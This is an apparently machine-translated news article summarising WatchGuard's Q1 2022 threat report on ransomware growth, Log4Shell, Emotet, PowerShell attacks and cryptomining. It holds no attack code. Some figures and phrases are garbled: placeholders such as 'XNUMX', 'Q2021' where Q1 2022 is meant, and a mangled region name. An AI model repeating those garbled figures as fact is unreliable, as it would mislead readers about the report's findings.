WatchGuard releases its Internet Security Report. The most important result first: the ransomware volume in the first quarter of 2022 is already twice as high as in the whole of 2021! Analysis shows a tripling of attacks via Log4Shell, the return of the Emotet botnet, an increase in cryptomining activity, and Lapsus$ is coming.
The threat of ransomware continues to grow inexorably: According to an analysis by the WatchGuard Threat Lab, there were already twice as many relevant attack attempts in the first quarter of 2022 as in the entire previous year. Corey Nachreiner, Chief Security Officer at WatchGuard, said: “Based on the extremely high level of ransomware at the beginning of the year and our data from the previous quarters, we expect 2022 to break all previous ransomware records.
Ransomware attacks are on the rise
For this reason, we strongly recommend that every company - and especially those in the particularly affected EMEA region - implement effective measures for extensive protection of IT infrastructures. A holistic approach plays a decisive role in this context, because only with the help of unified security can the constantly evolving threats be countered efficiently in the long term.” As if the threat posed by ransomware wasn’t enough, the WatchGuard Threat Lab also recorded a return in the first quarter of 2022 of the Emotet botnet on a large scale, the tripling of attacks on the Log4Shell vulnerability, and an increase in malicious cryptomining activity.
Findings from the Internet Security Report Q1-2022
- Number of ransomware attacks exploded – As late as the fourth quarter of 2021, the WatchGuard Internet Security Report noted a decline in the number of ransomware attacks compared to the previous year. This trend reversed dramatically in the first quarter of 2022. Notably, the number of ransomware attacks detected in Q2021 is already double the total number of detections in XNUMX.
- EMEA region remains a hotspot for malware threats - Regional attribution in terms of both simple and evasive malware shows that Firebox appliances in Europe, Middle East and Africa (EMEA), accounting for 57 percent of the overall statistics, were significantly more under attack than appliances in North, Central and Africa South America (AMER, here 22 percent) or the Asia-Pacific region (APAC, 21 percent).
- REvil is history, that's what LAPSUS$ is for – Although the notorious cybergang REvil was dissolved in the fourth quarter of 2021, another blackmailer group, LAPSUS$, is now attracting negative attention. WatchGuard's initial analysis suggests that it could contribute to a consistent expansion of the ransomware threat landscape in conjunction with many new ransomware variants such as BlackCat, the first malware written in the Rust programming language.
- Log4Shell added to top 10 list of network attacks - The Apache Log4j2 vulnerability, also known as Log4Shell, became known in early December 2021 and appeared late on the top 10 list of network attacks in the said quarter. However, compared to all IPS detections during this period, the proportion of the Log4Shell signature has almost tripled in the first quarter of this year. Log4Shell was highlighted as a top security incident in the latest Internet Security Report due to the highest possible 10,0 score in the Common Vulnerability Scoring System (CVSS). The reasons for this can be found in the wide use of Java programs and the ease of executing arbitrary code.
- Emotet makes a comeback – Emotet attracted attention with three of the top 10 detections in the first three months of this year and, after its return in the fourth quarter of 2021, represents the most widespread malware in Q1/2022. The discovered variants Trojan.Vita (this targeting Japan in particular and appears in the list of the top five most encrypted malware variants), and Trojan.Valyria both use exploits in Microsoft Office to download the Emotet botnet. The third Emotet-related malware sample, MSIL.Mensa.4, can spread through attached storage devices and primarily targeted networks in the US. WatchGuard Threat Lab data shows that Emotet acts as a dropper, downloading and installing the file from a malware delivery server.
- PowerShell scripts at the forefront of growing endpoint attacks - The total number of identified endpoint attacks increased 38 percent sequentially in the first quarter. Scripts, especially PowerShell-based ones, were the dominant attack vector during this period. With a share of 88 percent, they drove the number of total endpoint-focused events significantly compared to the previous quarter. PowerShell scripts accounted for 99,6 percent of script-related incidents in the first three months. A clear trend can be seen from this: Attackers are increasingly relying on fileless and living-off-the-land attacks with legitimate tools. Although these scripts are very popular, WatchGuard data shows that other sources of malware should not be overlooked either.
- Legal cryptomining with malicious background activities - The three additions to the top malware domains list in QXNUMX were related to Nanopool. Different cryptocurrencies are bundled together on this popular crypto mining platform to ensure a steady flow of income. Technically, these domains are legitimate and associated with a legally operating organization. However, the connections to these mining pools almost always originate on a corporate or educational network through malware infections and not legitimate mining activities.
- Organizations continue to face a variety of unique network attacks - While the top 10 IPS signatures accounted for 87 percent of all network attacks, the number of unique detections hit the highest level since early 2019. This increase indicates that automated attacks are focusing on a smaller subset of potential exploits, rather than mass to put. Overall, however, companies are still being hit by a wide range of attacks.
All of these findings in WatchGuard's quarterly research report are based on de-identified Firebox Feed data from active WatchGuard Fireboxes whose owners have consented to the sharing of data to support the Threat Lab's research. In the first quarter of 2022, WatchGuard blocked a total of more than 21,5 million malware variants (274 per device) and approximately 4,7 million network threats (60 per device). In addition to the diverse insights into the malware and network trends from the first quarter of 2022, the full report contains adequate information on recommended security strategies and important defense tips for companies of all sizes and industries.
More at Watchguard.com
About WatchGuard WatchGuard Technologies is one of the leading providers in the field of IT security. The extensive product portfolio ranges from highly developed UTM (Unified Threat Management) and next-generation firewall platforms to multifactor authentication and technologies for comprehensive WLAN protection and endpoint protection, as well as other specific products and intelligent services relating to IT security . More than 250.000 customers worldwide rely on the sophisticated protection mechanisms at enterprise level,